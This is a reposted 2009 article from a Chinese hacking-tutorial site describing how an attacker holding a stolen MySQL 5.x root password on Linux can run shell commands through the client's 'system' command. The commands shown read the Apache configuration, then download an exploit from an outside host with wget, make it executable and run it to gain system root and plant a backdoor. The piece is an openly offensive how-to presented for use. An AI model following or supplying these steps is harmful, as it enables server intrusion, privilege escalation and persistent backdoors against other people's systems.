获取邀请码
|
基地首页
|
基地文章
|
基地动画
|
基地软件
|
技术论坛
|
会员学院
设为主页
收入收藏
动画投稿
会员课程
文章
业内新闻
菜鸟宝典
QQ 文章
脚本攻防
安全防范
编程技术
网络技巧
加密破解
专题
提权专题
免杀专题
arp攻防
网吧攻防
动画
远控动画
菜鸟必看
QQ 攻防
漏洞攻防
安全教程
脚本注入
破解动画
语音动画
论坛
有问必答
免费培训
菜鸟乐园
网赚论坛
软件
远程控制
菜鸟工具
QQ 软件
漏洞利用
安全软件
扫描注入
加密破解
综合利用
会员
会员咨询
会员课程
加入会员
会员资源
下载
文章
动画
热门搜索:
安全
安全工具
网络安全
会员培训
CMS建站网
安全
攻防总结
免费资源
网赚文章
网管技巧
防火墙技术
端口入侵
Sniffer嗅探
arp技术
DDOS攻防
3389攻防
灰鸽子文章
逆向工程
破解实例
加密技术
脱壳技术
溢出漏洞
serv-u漏洞
社会工程学
渗透技术
跨站技术
提权技术
您现在的位置:
新世纪网安基地
>>
文章
>>
脚本攻防
>> 文章正文
linux下mysql 5.x得到root密码后的另外一种利用方式
作者:admin 文章来源:转载 点击数: 更新时间:2009-7-4
tr>
linux下mysql 5.x得到root密码后的另外一种利用方式
Author: Sh@dow
刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后
提权
如此这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行,搞到root权限,然后装后门虾米的
mysql>system wget
http://xxxx.xxx.com/xxxx ;
mysql>system chmod x xxxx;
mysql>system ./xxxx;
mysql>system wget
http://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。
或者,直接
提权
之后,下载后门安装,这个就留给大家去研究了。
『关闭该页』
『打印该页』
上一篇文章:
web和数据库分离的渗透思路
责任编辑:Wangtianxiang
下一篇文章:
玩转注册表高级用法--安全篇
最近更新
小黑哥:月收入3000的
黑客横行,教你设个陷阱
批处理学习完全教程
安全技巧:检查自己的
多种方法:揪出隐藏在电
介绍一种通过的个人电
SEO专家祝鹏:浅谈SEO
王通:让网络销售疯狂
三步让你录制的动画体
深度解析:IE7 0Day 漏
热门文章
小黑哥:月收入3000的
最高速的winrar密码破
“肉鸡”获取内幕揭秘
98888 QQ号被盗案水落
2009年最新QQ申诉经验
QQ盗号真凶被找到了
黑吃黑 中国最美女黑客
局域网检测全过程
黑客横行,教你设个陷阱
“谷歌一下”竟可搜出
相关文章
玩转注册表高级用法--
“黑客”竟敢街头招摇称
夫妻利用电话充值卡漏洞
保护Linux系统安全十招搞
如何防止整站SQL注入方式
80后大学生办网站被
菜鸟学习SEO笔记:网站优
BD+加密技术再次封锁破解
AspProductCatalog漏洞分
父子俩开“低价”购物网
虚拟货币新规出台 网游告
web和数据库分离的渗透思
QQ聊天频现“虚拟视频”
“99999”QQ号高卖出30万
命令下加账号新方法
Echo 出 WebShell
用iptables封杀内网的bt
利用cpl文件在xp中留一个
菜鸟基础:让被病毒恶意
上万"肉鸡"轰瘫小城网络
关于我们 |
加入会员
| 网安商城 |
投稿方法
|
广告报价
| 友情连接 | 网站地图 |
网安论坛
|
网安招聘
|
Java
加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223
.
浙ICP备06031184号